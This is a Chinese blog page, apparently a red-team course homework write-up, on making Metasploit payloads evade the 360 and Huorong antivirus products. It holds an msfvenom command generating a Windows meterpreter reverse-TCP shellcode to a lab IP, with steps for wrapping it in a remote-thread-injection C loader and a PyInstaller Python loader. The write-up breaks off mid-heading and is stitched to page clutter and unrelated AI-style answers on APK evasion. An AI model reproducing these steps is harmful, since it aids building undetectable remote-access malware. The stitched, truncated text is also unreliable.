红队培训班作业 | 免杀过360和火绒 四种方法大对比

文章来源|MS08067 红队培训班第12节课作业

本文作者:汤浩荡(红队培训班1期学员)


按老师要求尝试完成布置的作业如下:

环境准备:

Kali linux安装cs4.2,Windows7系统安装火绒杀毒和360杀毒,为测试免杀并且防止联网查杀,关闭网络连接。

一.Shellcode远程线程注入

1.msf生成c语言木马

msfvenom --list encoder

//查看编码模块,经过测试x86和x64均不能使用,会导致无法上线

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.12.145 lport=4444 -e cmd/powershell_base64 -i 5 -f c -o 2.c

//-e指定编码方式,-i编码次数,-f指定生成文件类型

2.复制shellcode内容,使用加载器中远程线程注入.c生成免杀处理码 Gedit 1.c

//编辑生成的c语言木马,复制shellcode

使用vs2019建立项目,并生成源.cpp(内容为远程线程注入.c),替换shellcode,并将编译运行库替换为mt多线程。

3.将所生成的免杀码进行免杀测试,结果如下:

免杀通过!


二.python加载器

本免杀方式继续使用之前生成的shellcode,使用notepad++替换掉双引号、\x和\r\n

而后替换掉加载器中的shellcode部分,如下图:

使用pyinstaller将py文件生成为exe文件

复制该exe文件使用火绒和360进行免杀测试,结果如下:

该方法火绒免杀失败

三.无文

  • 0
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 回答1: Msfvenom是开源安全工具Metasploit中的一个强大的工具,用于生成恶意文件。通过它可以生成各种类型的恶意文件,包括可执行文件、脚本、payload等。其中,在生成Android平台上的恶意文件时,最常用的是apk格式。Msfvenom生成apk文件的主要目的是用于在渗透测试或红队行动中进行攻击或利用。 想要绕过Android平台上的杀毒软件,需要对apk文件进行免杀处理。Msfvenom在生成apk文件时,可以设置一些参数来达到免杀的目的。比如说,可以指定恶意应用使用的一些系统权限和组件,以逃避杀毒软件的检测。还可以在生成payload时添加混淆(obfuscation)代码,使恶意代码更难被发现和分析。 Msfvenom还提供了一些其他的功能,如生成多个Paylod以及生成免杀的多平台Payload等。需要注意的是,使用Msfvenom生成一个完全免杀的apk是非常困难的。因为安全厂商会不断更新库以便检测恶意应用,开发者需要不断更新代码以保持攻击效果。 总的来说,Msfvenom是一款攻击能力强大的工具,但其需要谨慎使用,并且需要经过深入的学习和实践进行掌握。为了避免利用该工具进行恶意攻击,使用人员应当是经过事先明确授权的安全专业人员。 ### 回答2: MSFVenom是Metasploit框架中的一个模块,它可用于生成各种类型的恶意软件。其中,生成的APK免杀的原理主要是通过修改APK的元数据信息和代码,使之不被杀毒软件所识别。 具体来说,生成APK免杀的步骤如下: 首先,使用MSFVenom生成APK恶意软件,可以自定义恶意软件的功能和载荷类型。 然后,根据需要修改APK的元数据信息,如软件名称、版本号、签名等,以此来欺骗杀毒软件的识别机制。 接下来,对APK的代码进行混淆和加密处理,使其难以被分析和检测。常用的混淆和加密工具包括ProGuard、DexGuard、Jadx等。 最后,通过在恶意软件中植入反调试和动态加载技术等手段,进一步增强其免杀能力。 需要注意的是,在使用MSFVenom生成APK免杀的过程中,应当遵守法律法规,不得用于非法用途,以免触犯相关法律。同时,建议加强网络安全意识,加强网络安全防范,以免受到攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值